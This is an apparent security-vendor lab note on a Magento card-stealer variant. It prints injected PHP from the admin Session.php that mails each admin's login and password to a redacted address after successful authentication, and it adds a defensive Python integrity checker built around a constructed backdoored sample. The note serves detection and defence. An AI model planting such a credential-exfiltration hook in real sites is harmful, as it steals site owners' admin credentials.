Magento CC stealer adding user’s credentials to the loot

Labs Note

While analyzing a compromised Magento site, we found another Credit Card (CC) stealer variation. We have posted a few times about this type of malware, but this one differs in that it also steals the login credentials of the website's users. None of the samples we analyzed before had such behaviour.

The malicious code was found inside the app/code/core/Mage/Admin/Model/Session.php file and emails every login and password to XXX@XXX.com:

class Mage_Admin_Model_Session extends Mage_Core_Model_Session_Abstract
{
    ...skipped code...
    // Injected helper: builds "username|password|email|request URI" and mails it out
    // (the $pssword typo is reproduced as found in the sample)
    protected function testReview($username, $password, $email)
    {
        $to = 'removed@removed.dom';
        $subject = 'Webserver';
        $message = $username.'|'.$pssword.'|'.$email.'|'.$_SERVER['REQUEST_URI'];
        $headers = 'From: removed@removed.dom' . "\r\n" .
            'Reply-To: removed@removed.dom' . "\r\n" .
            'X-Mailer: PHP/' . phpversion();

        mail($to, $subject, $message, $headers);
    }
    ...skipped code...
    public function login($username, $password, $request = null) {
        ...skipped code...
        if ($user->getId()) {
            // Hook placed right after a successful admin authentication
            $this->testReview($username, $password, $user->getEmail());
            $this->renewSession();
            ...skipped code...
    ...skipped code...

This is the first time we see malware on Magento that steals credentials alongside credit card numbers. If you're using Magento as an e-commerce solution, always check your core files for any modified content, and do regular scans. As always, if you need a professional service for your website, you can count on Sucuri.
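The core-file check recommended above, as an added example that is not part of the original note or of Magento itself: it hashes a tree of PHP files against a known-good baseline manifest and then scans every modified or added file for direct mail() calls, which have no business in the admin session model. The CLEAN_SESSION and BACKDOORED_SESSION contents are constructed stand-ins, not real Magento source, and the mailbox in the sample is a placeholder.

```python
import hashlib
import re
from pathlib import Path

# Constructed stand-in for a pristine core file (not real Magento source).
CLEAN_SESSION = (b"<?php\nclass Mage_Admin_Model_Session {\n"
                 b"    public function login($username, $password) {\n"
                 b"        return $this->_authenticate($username, $password);\n"
                 b"    }\n}\n")
# The same file with a constructed exfiltration hook in the style of the sample above.
BACKDOORED_SESSION = CLEAN_SESSION.replace(
    b"return $this->_authenticate($username, $password);",
    b"mail('attacker@example.invalid', 'Webserver', $username.'|'.$password);\n"
    b"        return $this->_authenticate($username, $password);",
)
# A direct mail() call in a core session class is a finding on its own.
MAIL_CALL = re.compile(rb"\bmail\s*\(")

def hash_tree(files: dict) -> dict:
    """Map each relative path to the SHA-256 of its content (the baseline manifest)."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}

def load_tree(root: Path) -> dict:
    """Read every .php file under root into {relative_path: bytes} for a live check."""
    return {p.relative_to(root).as_posix(): p.read_bytes() for p in root.rglob("*.php")}

def compare_to_baseline(files: dict, baseline: dict) -> dict:
    """Classify files as modified, added or missing relative to the baseline manifest."""
    current = hash_tree(files)
    return {
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "missing": sorted(p for p in baseline if p not in current),
    }

def mail_call_lines(source: bytes) -> list:
    """Return 1-based line numbers of mail() calls in a PHP source file."""
    return [i for i, line in enumerate(source.splitlines(), 1) if MAIL_CALL.search(line)]

def audit(files: dict, baseline: dict) -> dict:
    """Integrity diff plus a mail() scan of every file that differs from the baseline."""
    report = compare_to_baseline(files, baseline)
    suspects = report["modified"] + report["added"]
    report["mail_calls"] = {p: mail_call_lines(files[p]) for p in suspects if mail_call_lines(files[p])}
    return report

SESSION_PATH = "app/code/core/Mage/Admin/Model/Session.php"
BASELINE = hash_tree({SESSION_PATH: CLEAN_SESSION})  # built from the pristine copy

if __name__ == "__main__":
    print(audit({SESSION_PATH: BACKDOORED_SESSION}, BASELINE))  # flags Session.php, mail() on line 4
```

For a real deployment, build BASELINE with hash_tree(load_tree(pristine_root)) from a clean Magento download of the same version and run audit(load_tree(site_root), BASELINE) on a schedule.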